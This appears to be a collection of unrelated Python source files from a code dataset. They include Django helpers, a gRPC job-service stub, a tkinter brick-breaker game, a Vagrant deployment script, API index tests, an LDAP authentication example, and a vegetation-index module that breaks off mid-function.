def authenticated_user_only(view_func):
def wrapper(request):
if request.user.is_authenticated:
return view_func(request)
return redirect('login')
return wrapper
def chat(view_func):
def wrapper(request, username):
if not request.user.is_authenticated:
return redirect('login')
if username == request.user.username:
return redirect('index')
return view_func(request, username)
return wrapper
|
StarcoderdataPython
|
1762892
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
import google.protobuf.empty_pb2 as google_dot_protobuf_dot_empty__pb2
import pysolveengine.svc_jobs_pb2 as svc__jobs__pb2
class JobStub(object):
"""A service for creating new jobs with the solveEngine
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.Create = channel.unary_unary(
'/solver.jobs.Job/Create',
request_serializer=svc__jobs__pb2.CreateJobRequest.SerializeToString,
response_deserializer=svc__jobs__pb2.CreateJobResponse.FromString,
)
self.Status = channel.unary_unary(
'/solver.jobs.Job/Status',
request_serializer=svc__jobs__pb2.JobRequest.SerializeToString,
response_deserializer=svc__jobs__pb2.JobStatus.FromString,
)
self.GetJobs = channel.unary_unary(
'/solver.jobs.Job/GetJobs',
request_serializer=svc__jobs__pb2.ListRequest.SerializeToString,
response_deserializer=svc__jobs__pb2.JobList.FromString,
)
self.Schedule = channel.unary_unary(
'/solver.jobs.Job/Schedule',
request_serializer=svc__jobs__pb2.JobRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.GetInput = channel.unary_unary(
'/solver.jobs.Job/GetInput',
request_serializer=svc__jobs__pb2.JobRequest.SerializeToString,
response_deserializer=svc__jobs__pb2.InputResponse.FromString,
)
self.GetResults = channel.unary_unary(
'/solver.jobs.Job/GetResults',
request_serializer=svc__jobs__pb2.JobRequest.SerializeToString,
response_deserializer=svc__jobs__pb2.ResultResponse.FromString,
)
self.Stop = channel.unary_unary(
'/solver.jobs.Job/Stop',
request_serializer=svc__jobs__pb2.JobRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.Delete = channel.unary_unary(
'/solver.jobs.Job/Delete',
request_serializer=svc__jobs__pb2.JobRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
class JobServicer(object):
"""A service for creating new jobs with the solveEngine
"""
def Create(self, request, context):
"""Create a new job for solving, it doesn't schedule the job
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Status(self, request, context):
"""View the job status
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetJobs(self, request, context):
"""List users' jobs
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Schedule(self, request, context):
"""Schedule a job for solving
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetInput(self, request, context):
"""Get job input files
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetResults(self, request, context):
"""Get job result files
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Stop(self, request, context):
"""Stop a running job
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Delete(self, request, context):
"""Delete job
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_JobServicer_to_server(servicer, server):
rpc_method_handlers = {
'Create': grpc.unary_unary_rpc_method_handler(
servicer.Create,
request_deserializer=svc__jobs__pb2.CreateJobRequest.FromString,
response_serializer=svc__jobs__pb2.CreateJobResponse.SerializeToString,
),
'Status': grpc.unary_unary_rpc_method_handler(
servicer.Status,
request_deserializer=svc__jobs__pb2.JobRequest.FromString,
response_serializer=svc__jobs__pb2.JobStatus.SerializeToString,
),
'GetJobs': grpc.unary_unary_rpc_method_handler(
servicer.GetJobs,
request_deserializer=svc__jobs__pb2.ListRequest.FromString,
response_serializer=svc__jobs__pb2.JobList.SerializeToString,
),
'Schedule': grpc.unary_unary_rpc_method_handler(
servicer.Schedule,
request_deserializer=svc__jobs__pb2.JobRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'GetInput': grpc.unary_unary_rpc_method_handler(
servicer.GetInput,
request_deserializer=svc__jobs__pb2.JobRequest.FromString,
response_serializer=svc__jobs__pb2.InputResponse.SerializeToString,
),
'GetResults': grpc.unary_unary_rpc_method_handler(
servicer.GetResults,
request_deserializer=svc__jobs__pb2.JobRequest.FromString,
response_serializer=svc__jobs__pb2.ResultResponse.SerializeToString,
),
'Stop': grpc.unary_unary_rpc_method_handler(
servicer.Stop,
request_deserializer=svc__jobs__pb2.JobRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'Delete': grpc.unary_unary_rpc_method_handler(
servicer.Delete,
request_deserializer=svc__jobs__pb2.JobRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'solver.jobs.Job', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
|
StarcoderdataPython
|
99777
|
from tkinter import *
import time
import random
root = Tk()
root.title("bb")
root.geometry("450x570")
root.resizable(0, 0)
root.wm_attributes("-topmost", 1)
canvas = Canvas(root, width=600, height=600, bd=0, highlightthickness=0, highlightbackground="white", bg="Black")
canvas.pack(padx=10, pady=10)
score = Label(height=0, width=0, font="Consolas 14 bold")
score.pack(side="left")
root.update()
class B:
def __init__(self, canvas, color, paddle, bricks, score):
self.bricks = bricks
self.canvas = canvas
self.paddle = paddle
self.score = score
self.bottom_hit = False
self.hit = 0
self.id = canvas.create_oval(10, 10, 25, 25, fill=color, width=1)
self.canvas.move(self.id, 230, 461)
start = [4, 3.8, 3.6, 3.4, 3.2, 3, 2.8, 2.6]
random.shuffle(start)
#print(start)
self.x = start[0]
self.y = -start[0]
self.canvas.move(self.id, self.x, self.y)
self.canvas_height = canvas.winfo_height()
self.canvas_width = canvas.winfo_width()
def brick_hit(self, pos):
for brick_line in self.bricks:
for brick in brick_line:
brick_pos = self.canvas.coords(brick.id)
#print(brick_pos)
try:
if pos[2] >= brick_pos[0] and pos[0] <= brick_pos[2]:
if pos[3] >= brick_pos[1] and pos[1] <= brick_pos[3]:
canvas.bell()
self.hit += 1
self.score.configure(text="Score: " + str(self.hit))
self.canvas.delete(brick.id)
return True
except:
continue
return False
def paddle_hit(self, pos):
paddle_pos = self.canvas.coords(self.paddle.id)
if pos[2] >= paddle_pos[0] and pos[0] <= paddle_pos[2]:
if pos[3] >= paddle_pos[1] and pos[1] <= paddle_pos[3]:
#print("paddle hit")
return True
return False
def draw(self):
self.canvas.move(self.id, self.x, self.y)
pos = self.canvas.coords(self.id)
#print(pos)
start = [4, 3.8, 3.6, 3.4, 3.2, 3, 2.8, 2.6]
random.shuffle(start)
if self.brick_hit(pos):
self.y = start[0]
if pos[1] <= 0:
self.y = start[0]
if pos[3] >= self.canvas_height:
self.bottom_hit = True
if pos[0] <= 0:
self.x = start[0]
if pos[2] >= self.canvas_width:
self.x = -start[0]
if self.paddle_hit(pos):
self.y = -start[0]
class Paddle:
def __init__(self, canvas, color):
self.canvas = canvas
self.id = canvas.create_rectangle(0, 0, 200, 30, fill=color)# rectangle dimention
self.canvas.move(self.id, 200, 485)# rectangle start from this point
self.x = 0
self.pausec=0
self.canvas_width = canvas.winfo_width()
self.canvas.bind_all("<Left>", self.turn_left)# if we click left arrow the rec shited left
self.canvas.bind_all("<Right>", self.turn_right)# if we click right arrow the rec shited right
#self.canvas.bind_all("<space>", self.pauser)
def draw(self):
pos = self.canvas.coords(self.id)
#print(pos)
if pos[0] + self.x <= 0:
self.x = 0
if pos[2] + self.x >= self.canvas_width:
self.x = 0
self.canvas.move(self.id, self.x, 0)
def turn_left(self, event):
self.x = -3.5
def turn_right(self, event):
self.x = 3.5
def pauser(self,event):
self.pausec+=1
if self.pausec==2:
self.pausec=0
class Bricks:
def __init__(self, canvas, color):
self.canvas = canvas
self.id = canvas.create_oval(5, 5, 25, 25, fill=color, width=2)
playing = False # default the game is off need to start it
def start_game(event):
global playing
if playing is False:
playing = True
score.configure(text="Score: 00")
canvas.delete("all")
BALL_COLOR = ["green", "green", "green"]
BRICK_COLOR = ["black", "black", "black"] # brick above
random.shuffle(BALL_COLOR)
paddle = Paddle(canvas, "blue")
bricks = []
for i in range(0, 5):
b = []
for j in range(0, 19):
random.shuffle(BRICK_COLOR)
tmp = Bricks(canvas, BRICK_COLOR[0])
b.append(tmp)
bricks.append(b)
for i in range(0, 5):
for j in range(0, 19):
canvas.move(bricks[i][j].id, 25 * j, 25 * i)
ball = B(canvas, BALL_COLOR[0], paddle, bricks, score)
root.update_idletasks()
root.update()
time.sleep(1)
while 1:
if paddle.pausec !=1:
try:
canvas.delete(m)
del m
except:
pass
if not ball.bottom_hit:
ball.draw()
paddle.draw()
root.update_idletasks()
root.update()
time.sleep(0.01)
if ball.hit==95:
canvas.create_text(250, 250, text="YOU WON !!", fill="yellow", font="Consolas 24 ")
root.update_idletasks()
root.update()
playing = False
break
else:
canvas.create_text(250, 250, text="GAME OVER!!", fill="red", font="Consolas 24 ")
root.update_idletasks()
root.update()
playing = False
break
else:
try:
if m==None:pass
except:
m=canvas.create_text(250, 250, text="PAUSE!!", fill="green", font="Consolas 24 ")
root.update_idletasks()
root.update()
root.bind_all("<Return>", start_game)
canvas.create_text(250, 250, text="To start press enter", fill="red", font="Consolas 18")
j=canvas.find_all()
root.mainloop()
|
StarcoderdataPython
|
6415639
|
<gh_stars>0
import os
import logging
TEST_FLAG = os.environ.get("TEST_FLAG")
environment = os.environ.get("environment")
def determine_environment (environment):
logging.info("The environment is " + environment)
if TEST_FLAG == "true" and environment != "bad":
if os.system("vagrant up unit_test") !=0:
logging.exception("Unittest failed")
else:
os.system("vagrant destroy unit_test")
return True
elif environment == "development":
logging.info("Depploying the development environment")
if os.system("vagrant up development-vm1") !=0:
logging.exception("Vagrant failed to deploy")
if os.system("vagrant up development-vm2") !=0:
logging.exception("Vagrant failed to deploy")
else:
return True
elif environment == "main":
if os.system("vagrant up main-vm1") !=0:
logging.exception("Vagrant failed to deploy")
if os.system("vagrant up main-vm2") !=0:
logging.exception("Vagrant failed to deploy")
else:
return True
elif environment == "production":
if os.system("vagrant up production-vm1") !=0:
logging.exception("Vagrant failed to deploy")
if os.system("vagrant up production-vm2") !=0:
logging.exception("Vagrant failed to deploy")
else:
return True
else:
logging.exception("The wrong environment was called")
if __name__ == "__main__":
determine_environment(environment)
|
StarcoderdataPython
|
331896
|
import numpy as np
import matplotlib.pyplot as pl
import pysir
import time
from tqdm import tqdm
l = [['200,201',-500,10,1500]]
SIR = pysir.SIR(l)
psf = np.loadtxt('PSF.dat', dtype=np.float32)
SIR.set_PSF(psf[:,0].flatten(), psf[:,1].flatten())
out = np.loadtxt('model.mod', dtype=np.float32, skiprows=1)[:,0:8]
out = np.delete(out, 2, axis=1)
departure = np.ones((2, SIR.nLines, out.shape[0]), dtype=np.float32)
stokes, rf = SIR.synthesize(out, departure=departure)
nz = out.shape[0]
rf_numerical = np.zeros((4, SIR.nLambda, nz))
for i in tqdm(range(73)):
out_new = np.copy(out)
out_new[i,1] += 1.0
stokes_new = SIR.synthesize(out_new, departure=departure, returnRF=False)
rf_numerical[:,:,i] = (stokes_new[1:,:] - stokes[1:,:]) / 1.0
f, ax = pl.subplots(ncols=4, nrows=3, figsize=(16,8))
for i in range(4):
ax[0,i].plot(stokes[0,:], stokes[i+1,:])
im = ax[1,i].imshow(rf[0][i,:,:].T)
pl.colorbar(im, ax=ax[1,i])
im = ax[2,i].imshow(rf_numerical[i,:,:].T)
pl.colorbar(im, ax=ax[2,i])
# pl.tight_layout()
pl.show()
# start = time.time()
# for i in range(50):
# stokes, rf = pysir.synthesize(out, returnRF=True)
# print('Elapsed time 50 synthesis : {0} s'.format(time.time()-start))
|
StarcoderdataPython
|
11202051
|
<reponame>AsafBarZvi/MSc_project
import time
import numpy as np
class Timer:
def __init__(self,name):
self._name = name
self._tstarts = []
self._tends = []
def __enter__(self):
if len(self._tstarts) < 3000:
self._tstarts.append(time.time())
return self
def __exit__(self,exc_type, exc_value, traceback):
if len(self._tends) < 3000:
self._tends.append(time.time())
def stats(self):
if (len(self._tstarts) == 0) or (len(self._tends) == 0):
return 0 , 0 , 0
starts = np.array(self._tstarts)
ends = np.array(self._tends)
return np.mean(ends - starts) , np.std(ends - starts) , np.max(ends - starts)
timer_dict = dict(train = Timer('train'),
summary = Timer('summary'))
def timerStats():
for n , t in timer_dict.iteritems():
print "TIMER {:s} stats: mean {:.6f} , std {:.6f} , max {:.6f}".format(n , *t.stats())
|
StarcoderdataPython
|
6419410
|
<filename>teacher/models.py
from django.db import models
# from subject.models import Subject
from department.models import Department
# Create your models here.
class Teacher(models.Model):
name= models.CharField(max_length=200)
teacher_bio= models.TextField(max_length=5000)
# subject = models.OneToOneField(
# Subject,
# on_delete=models.DO_NOTHING
# )
depertment = models.OneToOneField(
Department,
on_delete=models.DO_NOTHING
)
def __str__(self):
return self.name
|
StarcoderdataPython
|
9756712
|
<filename>tests/basics/bool1.py
# tests for bool objects
# basic logic
print(not False)
print(not True)
print(False and True)
print(False or True)
# unary operators
print(+True)
print(-True)
|
StarcoderdataPython
|
6694339
|
<gh_stars>100-1000
from specs import BaseTest
class IndexesTest(BaseTest):
def setUp(self):
super().setUp()
self.helper_indexes_testdata_prepare()
def test_get_indexes(self):
"""Should be able to get indexes list"""
status, body = self.api_get_indexes(self.current_db, self.current_ns)
self.validate_get_list_response(status, body, 'Indexes')
def test_create_indexes(self):
"""Should be able to create indexes"""
count = 5
indexes_arr_of_dicts = self.helper_index_array_construct(count)
for i in range(0, count):
status, body = self.api_create_index(
self.current_db, self.test_ns, indexes_arr_of_dicts[i])
self.assertEqual(True, status == self.API_STATUS['success'], body)
status, body = self.api_get_namespace(self.current_db, self.test_ns)
self.validate_get_namespace_response(
status, body, indexes_arr_of_dicts)
def test_delete_index(self):
"""Should be able to delete an index"""
count = 5
indexes_arr_of_dicts = self.helper_index_array_construct(count)
for i in range(0, count):
status, body = self.api_create_index(
self.current_db, self.test_ns, indexes_arr_of_dicts[i])
self.assertEqual(True, status == self.API_STATUS['success'], body)
status, body = self.api_get_namespace(self.current_db, self.test_ns)
self.validate_get_namespace_response(
status, body, indexes_arr_of_dicts)
first_index = indexes_arr_of_dicts[0]
first_index_name = first_index['name']
status, body = self.api_delete_index(
self.current_db, self.test_ns, first_index_name)
self.assertEqual(True, status == self.API_STATUS['success'], body)
status, body = self.api_get_namespace(self.current_db, self.test_ns)
self.validate_get_namespace_response(
status, body, indexes_arr_of_dicts[1:])
def test_update_index(self):
"""Should be able to update an index"""
index = self.helper_index_construct(
name='id', field_type='int', index_type='hash', is_pk=True)
status, body = self.api_create_index(
self.current_db, self.test_ns, index)
self.assertEqual(True, status == self.API_STATUS['success'], body)
index_dict = []
index_dict.append(index)
status, body = self.api_get_namespace(self.current_db, self.test_ns)
self.validate_get_namespace_response(
status, body, index_dict)
updated_index = self.helper_index_construct(
name='id', field_type='double', index_type='tree', is_pk=True)
updated_index_dict = []
updated_index_dict.append(updated_index)
status, body = self.api_update_index(
self.current_db, self.test_ns, updated_index)
self.assertEqual(True, status == self.API_STATUS['success'], body)
status, body = self.api_get_namespace(self.current_db, self.test_ns)
self.validate_get_namespace_response(status, body, updated_index_dict)
def test_update_index_to_string(self):
"""Should not be able to update an index to string type"""
index = self.helper_index_construct(
name='id', field_type='int', index_type='hash', is_pk=True)
status, body = self.api_create_index(
self.current_db, self.test_ns, index)
self.assertEqual(True, status == self.API_STATUS['success'], body)
index_dict = []
index_dict.append(index)
status, body = self.api_get_namespace(self.current_db, self.test_ns)
self.validate_get_namespace_response(
status, body, index_dict)
updated_index = self.helper_index_construct(
name='id', field_type='string', index_type='hash', is_pk=True)
updated_index_dict = []
updated_index_dict.append(updated_index)
status, body = self.api_update_index(
self.current_db, self.test_ns, updated_index)
self.assertEqual(False, status == self.API_STATUS['success'], body)
status, body = self.api_get_namespace(self.current_db, self.test_ns)
self.validate_get_namespace_response(status, body, index_dict)
|
StarcoderdataPython
|
8155634
|
from client_of_redundant_servers.client_of_redundant_ad_ldap_servers import ClientOfRedundantAdLdapServers
from client_of_redundant_servers.client_of_redundant_servers import AllAvailableServersFailed
from collections import OrderedDict
LDAP_SERVERS = OrderedDict()
LDAP_SERVERS['srvr-dc1.myad.private.example.com'] = {'port': 636,
'ssl': True,
'validate': True}
LDAP_SERVERS['srvr-dc2.myad.private.example.com'] = {'port': 636,
'ssl': True,
'validate': True}
LDAP_AD_DOMAIN = 'myad'
LDAP_SEARCH_BASE = 'ou=Users,ou=MyOrg,dc=myad,dc=private,dc=example,dc=com'
servers = ClientOfRedundantAdLdapServers(server_dict=LDAP_SERVERS,
ad_domain=LDAP_AD_DOMAIN,
ldap_search_base=LDAP_SEARCH_BASE)
ldap_uid = 'test'
ldap_pass = '<PASSWORD>'
try:
auth_user = servers.ldap_auth(ldap_uid, ldap_pass)
if auth_user:
print("Accepted")
else:
print("Rejected")
except AllAvailableServersFailed:
print("Error: no servers available")
|
StarcoderdataPython
|
1643273
|
<gh_stars>0
# -*- coding: utf-8 -*-
"""
Created on Thu Sep 10 17:48:34 2020
@author: rcard
"""
#As próximas 3 linhas são para selecionar entre plot inline ou em nova janela
#Útil para rlocus
from IPython import get_ipython
get_ipython().run_line_magic('matplotlib', 'qt')
#get_ipython().run_line_magic('matplotlib', 'inline')
import numpy as np #Biblioteca para cálculo numérico
import math #Funções matemáticas
import matplotlib.pyplot as plt # Funções de plot similares as do MATLAB
import control as ctrl # Biblioteca para controle
from control.matlab import * # Funções para controle similares as do MATLAB
#Planta
num=[4]
den=[1, 0.5, 0]
G=tf(num,den)
print(G)
#Planta sem compensação em malha fechada
Gmf=feedback(G,1)
#Polos de MF sem compensação
print(pole(Gmf))
#Compensador
numc=[1.13, 6.4749, 1.2498]
denc=[1, 0]
Gc=tf(numc,denc)
print(Gc)
#Planta com compensação em malha fechada
Gmfc=feedback(Gc*G,1)
#Polos de MF do sistema compensado
print(pole(Gmfc))
#Resposta ao degrau
t=np.linspace(0,25,1000)
y1, t1 = step(Gmf,t)
y2, t2 = step(Gmfc,t)
plt.figure()
plt.plot(t1,y1,t2,y2)
plt.title('Resposta ao degrau')
plt.legend(('Sem compensação', 'Com compensação'))
plt.xlabel('t(s)')
plt.ylabel('Amplitude')
plt.grid()
#Lugar das raízes da planta e da planta compensada
rlocus(G)
rlocus(Gc*G)
#Resposta a rampa
Gi=tf([1],[1, 0]);
T=np.linspace(0,50,1000)
y3, t3 = step(Gi,T)
y4, t4 = step(Gi*Gmf,T)
y5, t5 = step(Gi*Gmfc,T)
plt.figure()
plt.plot(t3,y3,t4,y4,t5,y5)
plt.title('Resposta a rampa')
plt.legend(('Referência', 'Gmf','Gmfc'))
plt.xlabel('t(s)')
plt.ylabel('Amplitude')
plt.grid()
#Erros
y6, t6 = step(Gi,T)
y7, t7 = step(Gi*Gmf,T)
y8, t8 = step(Gi*Gmfc,T)
erro_MF=y3-y4
erro_MF_C=y3-y5
plt.figure()
plt.plot(T,erro_MF,T,erro_MF_C)
plt.title('Erro de rastreamento para referência do tipo rampa')
plt.legend(('Sem compensação', 'Com compensação'))
plt.xlabel('t(s)')
plt.ylabel('Amplitude')
plt.grid()
|
StarcoderdataPython
|
3521327
|
#!/usr/bin/env python
"""
@authors: <NAME>, <NAME>
Date Created: 9/24/2011
"""
from __future__ import division, print_function
from future.utils import iteritems, viewitems
from builtins import int
import os
import sys
import subprocess
import time
from copy import copy
import multiprocessing as mpr
import argparse
import fnmatch
from collections import OrderedDict
# MapPy
try:
from . import raster_tools
except:
import raster_tools
from . import utils
from .errors import logger
from .helpers import _iteration_parameters
# Numpy
try:
import numpy as np
except ImportError:
raise ImportError('NumPy must be installed')
# Numexpr
try:
import numexpr as ne
ne.set_num_threads(mpr.cpu_count())
numexpr_installed = True
except:
numexpr_installed = False
# Carray
# try:
# import carray as ca
# carray_installed = True
# except:
# carray_installed = False
# GDAL
try:
from osgeo import gdal
from osgeo.gdalconst import *
except ImportError:
raise ImportError('GDAL must be installed')
# Scikit-image
try:
from skimage.exposure import rescale_intensity
except ImportError:
raise ImportError('Scikit-image must be installed')
try:
import deprecation
except ImportError:
raise ImportError('deprecation must be installed (pip install deprecation)')
old_settings = np.seterr(all='ignore')
class SensorInfo(object):
"""
A class to hold sensor names, wavelengths, and equations.
"""
def __init__(self):
self.sensors = utils.SUPPORTED_SENSORS
self.band_orders = utils.SENSOR_BAND_DICT
# The wavelengths needed to compute the index.
# The wavelengths are loaded in order, so the
# order should match the equations in
# ``self.equations``.
self.wavelength_lists = utils.VI_WAVELENGTHS
# The vegetation index equations. The arrays are
# loaded from ``self.wavelength_lists``. For example,
# ``array01`` of 'ARVI' would be the 'blue' wavelength.
self.equations = \
{'ARVI': '((array03 / scale_factor) - ((array02 / scale_factor) - '
'y*((array01 / scale_factor) - (array02 / scale_factor)))) / '
'((array03 / scale_factor) + ((array02 / scale_factor) - '
'y*((array01 / scale_factor) - (array02 / scale_factor))))',
'BRIGHT': '((array01 / scale_factor)**2 + (array02 / scale_factor)**2 + (array03 / scale_factor)**2 + (array04 / scale_factor)**2)**0.5',
'CBI': '((array02 / scale_factor) - (array01 / scale_factor)) / '
'((array02 / scale_factor) + (array01 / scale_factor))',
'CIRE': '((array02 / scale_factor) / (array01 / scale_factor)) - 1.',
'EVI': 'g * (((array03 / scale_factor) - (array02 / scale_factor)) / '
'((array03 / scale_factor) + (c1 * (array02 / scale_factor)) - '
'(c2 * (array01 / scale_factor)) + L))',
'EVI2': 'g * (((array02 / scale_factor) - (array01 / scale_factor)) / '
'((array02 / scale_factor) + L + (c1 * (array01 / scale_factor))))',
'IPVI': '(array02 / scale_factor) / ((array02 / scale_factor) + (array01 / scale_factor))',
'MSAVI': '((2 * array02 + 1) - ((((2 * array02 + 1)**2) - (8 * (array02 - array01)))**.5)) / 2',
'GNDVI': '((array02 / scale_factor) - (array01 / scale_factor)) / '
'((array02 / scale_factor) + (array01 / scale_factor))',
'MNDWI': '((array02 / scale_factor) - (array01 / scale_factor)) / '
'((array02 / scale_factor) + (array01 / scale_factor))',
'NDSI': '((array02 / scale_factor) - (array01 / scale_factor)) / '
'((array02 / scale_factor) + (array01 / scale_factor))',
'NDBAI': '((array02 / scale_factor) - (array01 / scale_factor)) / '
'((array02 / scale_factor) + (array01 / scale_factor))',
'NBRI': '((array02 / scale_factor) - (array01 / scale_factor)) / '
'((array02 / scale_factor) + (array01 / scale_factor))',
'NDII': '(array03 - array02 + array01) / (array03 + array02 + array01)',
'NDVI': '((array02 / scale_factor) - (array01 / scale_factor)) / '
'((array02 / scale_factor) + (array01 / scale_factor))',
'RENDVI': '((array02 / scale_factor) - (array01 / scale_factor)) / '
'((array02 / scale_factor) + (array01 / scale_factor))',
'NDWI': '((array02 / scale_factor) - (array01 / scale_factor)) / '
'((array02 / scale_factor) + (array01 / scale_factor))',
'PNDVI': '((array02 / scale_factor) - (array01 / scale_factor)) / '
'((array02 / scale_factor) + (array01 / scale_factor))',
'RBVI': '((array02 / scale_factor) - (array01 / scale_factor)) / '
'((array02 / scale_factor) + (array01 / scale_factor))',
'GBVI': '((array02 / scale_factor) - (array01 / scale_factor)) / '
'((array02 / scale_factor) + (array01 / scale_factor))',
'ONDVI': '(4. / pi) * arctan(((array02 / scale_factor) - (array01 / scale_factor)) / '
'((array02 / scale_factor) + (array01 / scale_factor)))',
'SATVI': '((((array02 / scale_factor) - (array01 / scale_factor)) / '
'((array02 / scale_factor) + (array01 / scale_factor) + L)) * (1. + L)) - '
'((array03 / scale_factor) / 2.)',
'SAVI': '(((array02 / scale_factor) - (array01 / scale_factor)) / '
'((array02 / scale_factor) + (array01 / scale_factor) + L)) * (1. + L)',
'OSAVI': 'arctan(((((array02 / scale_factor) - (array01 / scale_factor)) / '
'((array02 / scale_factor) + (array01 / scale_factor) + L)) * (1. + L)) / 1.5) * 2.',
'SVI': '(array02 / scale_factor) / (array01 / scale_factor)',
'TNDVI': 'sqrt((((array02 / scale_factor) - (array01 / scale_factor)) / '
'((array02 / scale_factor) + (array01 / scale_factor))) * .5)',
'TVI': 'sqrt((((array02 / scale_factor) - (array01 / scale_factor)) / '
'((array02 / scale_factor) + (array01 / scale_factor))) + .5)',
'TWVI': '((array02 / scale_factor) - (array01 / scale_factor)) / '
'((array02 / scale_factor) + (array01 / scale_factor))',
'YNDVI': '((array02 / scale_factor) - (array01 / scale_factor)) / '
'((array02 / scale_factor) + (array01 / scale_factor))',
'VCI': '(((array02 - array01) / (array02 + array01)) - min_ndvi) / (max_ndvi - min_ndvi)',
'VISMU': '((array01 / scale_factor) + (array02 / scale_factor) + (array03 / scale_factor)) / 3.',
'WI': '(array01 / scale_factor) + (array02 / scale_factor)'}
# The data ranges for scaling, but only
# used if the output storage type is not
# equal to 'float32'.
self.data_ranges = {'ARVI': (),
'BRIGHT': (0.0, 1.0),
'CBI': (-1.0, 1.0),
'CIRE': (-1.0, 1.0),
'EVI': (0., 1.0),
'EVI2': (0., 1.0),
'IPVI': (),
'MSAVI': (),
'GNDVI': (-1.0, 1.0),
'MNDWI': (-1.0, 1.0),
'NDSI': (-1.0, 1.0),
'NDBAI': (-1.0, 1.0),
'NBRI': (-1.0, 1.0),
'NDII': (-1.0, 1.0),
'NDVI': (-1.0, 1.0),
'RENDVI': (-1.0, 1.0),
'NDWI': (-1.0, 1.0),
'PNDVI': (-1.0, 1.0),
'RBVI': (-1.0, 1.0),
'GBVI': (-1.0, 1.0),
'ONDVI': (),
'SATVI': (),
'SAVI': (),
'OSAVI': (),
'SVI': (),
'TNDVI': (),
'TVI': (),
'YNDVI': (-1.0, 1.0),
'TWVI': (-1, 1),
'VCI': (),
'VISMU': (0., 1.0),
'WI': (0.0, 1.0)}
def list_expected_band_order(self, sensor):
# Return the dictionary sorted by values
self.expected_band_order = OrderedDict(sorted(list(iteritems(self.band_orders[sensor])), key=lambda sbo: sbo[1]))
logger.info('\nExpected band order for {}:\n'.format(sensor))
logger.info(' WAVELENGTH Band')
logger.info(' ---------- ----')
sp = ' '
for w, b in viewitems(self.expected_band_order):
gap_string = ''
gap_len = 12 - len(w)
for gx in range(0, gap_len):
gap_string += sp
logger.info(' {}{}{:d}'.format(w.upper(), gap_string, b))
print('')
def list_indice_options(self, sensor):
"""
Lists the vegetation indices that can be computed from the given sensor.
Args:
sensor (str): The sensor.
"""
if sensor not in self.sensors:
raise NameError('{} not a sensor option. Choose one of {}'.format(sensor, ', '.join(self.sensors)))
self.sensor_indices = []
# A list of wavelengths in the
# current sensor.
sensor_wavelengths = list(self.band_orders[sensor])
# All of the vegetation index wavelengths must
# be in the sensor wavelength.
for veg_index, indice_wavelengths in viewitems(self.wavelength_lists):
if set(indice_wavelengths).issubset(sensor_wavelengths):
self.sensor_indices.append(veg_index)
class VegIndicesEquations(SensorInfo):
"""
A class to compute vegetation indices
Args:
image_array (ndarray)
no_data (Optional[int]): The output 'no data' value. Overflows and NaNs are filled with ``no_data``.
Default is 0.
in_no_data (Optional[int]): The input 'no data' value.
chunk_size (Optional[int]): The chunk size to determine whether to use ``ne.evaluate``. Default is -1, or
use ``numexpr``.
mask_array (Optional[2d array]): A mask where anything equal to 255 is background. Default is None.
"""
def __init__(self, image_array, no_data=0, in_no_data=0, chunk_size=-1, mask_array=None):
self.image_array = np.float32(image_array)
self.no_data = no_data
self.in_no_data = in_no_data
self.chunk_size = chunk_size
self.mask_array = mask_array
SensorInfo.__init__(self)
try:
self.array_dims, self.array_rows, self.array_cols = image_array.shape
except:
raise ValueError('The input array must be at least 3d.')
def rescale_range(self, array2rescale, in_range=()):
if self.out_type > 3:
raise ValueError('The output type cannot be greater than 3.')
if self.out_type == 2:
if in_range:
array2rescale_ = np.uint8(rescale_intensity(array2rescale,
in_range=in_range,
out_range=(0, 254)))
else:
array2rescale_ = np.uint8(rescale_intensity(array2rescale, out_range=(0, 254)))
elif self.out_type == 3:
if in_range:
array2rescale_ = np.uint16(rescale_intensity(array2rescale,
in_range=in_range,
out_range=(0, 10000)))
else:
array2rescale_ = np.uint16(rescale_intensity(array2rescale, out_range=(0, 10000)))
return np.where(array2rescale == self.no_data, self.no_data, array2rescale_)
def compute(self, vi_index, out_type=1, scale_factor=1.0, **kwargs):
"""
Args:
vi_index (str): The vegetation index to compute.
out_type (Optional[int]): This controls the output scaling. Default is 1, or return 'as is'. Choices
are [1, 2, 3].
1 = raw values (float32)
2 = scaled (byte)
3 = scaled (uint16)
scale_factor (Optional[float]): A scale factor to divide the inputs by. Default is 1.
Example:
>>> from mappy.features import VegIndicesEquations
>>>
>>> # Create a fake 2-band array.
>>> image_stack = np.random.randn(2, 100, 100, dtype='float32')
>>>
>>> # Setup the vegetation index object.
>>> vie = VegIndicesEquations(image_stack)
>>>
>>> # Calculate the NDVI vegetation index.
>>> ndvi = vie.compute('NDVI')
"""
self.vi_index = vi_index
self.out_type = out_type
self.n_bands = len(self.wavelength_lists[self.vi_index.upper()])
# Use ``numexpr``.
if self.chunk_size == -1:
if vi_index.lower() == 'twvi':
imcopy = self.image_array.copy()
if kwargs:
